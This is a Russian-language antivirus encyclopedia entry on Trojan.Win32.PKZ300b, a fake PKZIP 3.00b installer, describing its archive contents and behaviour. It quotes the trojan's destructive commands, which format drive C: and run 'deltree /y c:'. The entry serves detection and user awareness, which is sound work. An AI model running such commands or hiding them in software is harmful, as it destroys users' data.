Trojan.Win32.PKZ300b

Родительский класс: TrojWare

Вредоносные программы, которые осуществляют несанкционированные пользователем действия: уничтожают, блокируют, модифицируют или копируют информацию, нарушают работу компьютеров или компьютерных сетей. В отличие от вирусов и червей, представители этой категории не умеют создавать свои копии, не способны к самовоспроизведению.

Класс: Trojan

Вредоносная программа, занимающаяся уничтожением, блокированием, модификацией или копированием информации, нарушением работы компьютеров или компьютерных сетей, и при этом не попавшая ни в один из классов троянских программ.

Подробнее

Платформа: Win32

Win32 - платформа, управляемая операционной системой на базе Windows NT (Windows XP, Windows 7 и т.д.), позволяющей исполнять 32-битные приложения. В настоящее время данная платформа является одной из наиболее распространенных.

Описание

Technical Details

Представляет из себя self-extracting (Zip2Exe) архив с именем PKZ300B.EXE и длиной 178981 байт. Внутри архива - 5 файлов:

имя файла       длина   что внутри
---------       -----   ----------
PKZINST.EXE      5328   сам троянец
WHATSNEW.300     2417   WhatsNew из PkZip 2.04c, все строки "2.04c"
заменены на "3.0"
COMPRESS.000   124005   ARJ 2.41, плюс экстра-данные
COMPRESS.001   116260   ARJ 2.41 сам по себе
FILE_ID.DIZ       101   DOC-файл, говорит про этот архив, что он -
Pkzip 3.00b.

Троянцем является единственный файл - PKZINST.EXE. Hаписан он на TurboPascal. При запуске выводит текст:

PKZIP (R) Install Utility   Version 3.00b  4-05-950
Copr. 1989-1995 Pkware Inc. All Rights Reserved.
Pkzip Reg. U.S. Pat. and Tm. Off.

Initializing, this may take a few minutes....

и выполняет две команды:

COMMAND.COM /C Format c: > NULL
COMMAND.COM /C deltree /y c: > NULL

К счастью, автору троянца не хватило ума сделать троянца без ошибок, и троянец затыкается на первой же команде - DOS ждет ответа на стандартный запрос:

WARNING: ALL DATA ON NON-REMOVABLE DISK
DRIVE C: WILL BE LOST!
Proceed with Format (Y/N)?

Причем самого этого запроса на экране не видно. Hе дай бог, конечно же, нажать "Y" или "N". Если "Y", то пойдет формат диска C:, если "N", то пойдет работать DELTREE. Однако естественное желание при виде заснувшей программы - нажать Reset или Ctrl-C/Break. В обоих случаях троянец отрубается безо всякой потери данных, а если выход произошел по Ctrl-C, то он еще вякнет напоследок:

Thanks for waiting, moron. You shouldn't have fucked with us.

и вываливается в DOS. Так что, благодаря этой ошибке юзер может спать спокойно и не бояться новых версий PKZip. Плюс к тому: в троянце есть еще одна ошибка. Перенаправление "> NULL" создает на диске файл NULL, а автор троянца видимо, хотел отключить посторонний вывод на экран перенаправлением "> NUL". Судя по всему сие [юное] дарование читает DOS User's Guide и еще не дошло до буквы 'N' в алфавитном списке команд DOS. AVP ловит этого троянца под именем "Trojan.PKZ300b" как в распакованном файле, так и в self-extracting архиве.

Смотрите также

Узнай статистику распространения уязвимостей в своем регионе statistics.securelist.com